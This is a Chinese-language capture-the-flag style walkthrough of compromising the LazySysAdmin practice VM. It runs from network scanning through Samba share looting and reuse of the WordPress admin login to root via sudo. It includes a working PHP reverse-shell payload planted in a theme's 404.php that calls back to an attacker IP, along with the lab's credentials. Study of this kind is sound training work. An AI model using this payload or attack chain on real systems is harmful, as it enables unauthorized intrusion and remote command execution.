Lazy靶机渗透
1. 渗透过程
话不多少说开始搜集信息:
这里使用
netdiscover
:netdiscover -i eth0 -r 192.168.0.0/24
发现一条
192.168.0.110 00:0c:29:b8:5f:5f 1 60 VMware, Inc.
使用nmap进一步探测端口
nmap -sS 192.168.0.110 -oN /tmp/r.txt
扫描结果
Host is up (0.00022s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
MAC Address: 00:0C:29:B8:5F:5F (VMware)
#后来用 nmap -v -A 192.168.0.110 扫面出
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)80肯定是web,139和445都是Samba
我们先用nikto 扫面一下web,再试试Samba能不能连接
nikto -host http://192.168.0.110/ -o /tmp/r.html
我用kali里面的连接网络文件夹输入
smb://192.168.0.110
发现有两个文件夹一个是
$print
另一个是$share
发现第一个需要密码,第二个可以匿名访问进去看看,都是一代码
还找到一个文件
deets.txt
内容是CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
CBF记住所有这些密码。
请记住在我们推出服务器后删除此文件并更新您的密码。
密码12345发现一个服务器默认的密码
12345
这时候我们在看nikto扫描的结果:
发现网站是
wordpress
框架,还有phpmyadmin
的地址…进到wordpress之后发现只有一篇文章,都是这句话
My name is togie.
这可能是某个用户名
这些相关的目录在
$share
都有那我们直接找wordpress
的后台地址:wp-admin
还在
wp-config.php
找到了mysql的账号密码Admin :TogieMYSQL12345^^
而且nikto还扫描到
phpmyadmin
的地址,登进去看看,发现没有select权限,那我们进去
wp-admin
看看也需要密码,咋办没密码呀,数据库也进不去,那就试试mysql的密码吧发现mysql的密码竟然和
wordpress
的账号密码是一样进后台之后,查到可以修改主题的源代码,那我们就修改
404.php
给了一个反弹shell的代码:
set_time_limit(0);
$ip='192.168.0.21';
$port='20096';
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){ echo "error";}
else{
fputs($fp,"\nconnect success\n");
while (!feof($fp)) {
fputs($fp,"shell:");
$shell=fgets($fp);
$message=`$shell`;
fputs($fp,$message);
}
fclose($fp);
}
然后nc监听一下,激活主题并且访问一个不存在的帖子
http://192.168.0.110/wordpress/?p=-1
nc就弹回一个
www-dada
的shell然后我们查看
/etc/passwd
文件发现togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
哈?这不就是之前说的那个可能的用户名嘛
然后服务器默认的密码
12345
,那我们试试ssh能不能给他连上了kali输入命令 :
ssh togie@192.168.0.110
给我来一一段这样的话?#############################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
#############################################################################
togie@192.168.0.110's password:
1. 欢迎使用Web目录1
2. 所有连接都被监视和记录
3. 如果您不是授权用户,请立即断开连接!哈? 吓我呢?
试试密码,进去了,哈哈哈~
走一下三部曲
ls -al ~/
发现没啥
crontab -l
也没啥
history
也没啥~
然后我加一个第四部曲
sudo -l
User togie may run the following commands on LazySysAdmin:
(ALL : ALL) ALL
用户togie可以在lazysadmin上运行以下命令:
(全部:全部)全部那还说什么 直接就是root权限了
直接
sudo passwd root
root不就来了嘛
root用户下看到一个
proof.txt
内容是:
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19puWELL_DONE!!!
2. 重要信息
# 1. phpmyadmin地址
http://192.168.0.110/phpmyadmin/
# 2. wordpress管理后台
http://192.168.0.110/wordpress/wp-admin
# 3. mysql账号密码:
Admin :TogieMYSQL12345^^ (也是wordpress管理后台的账号密码)
# 4. ssh账号密码:
togie :12345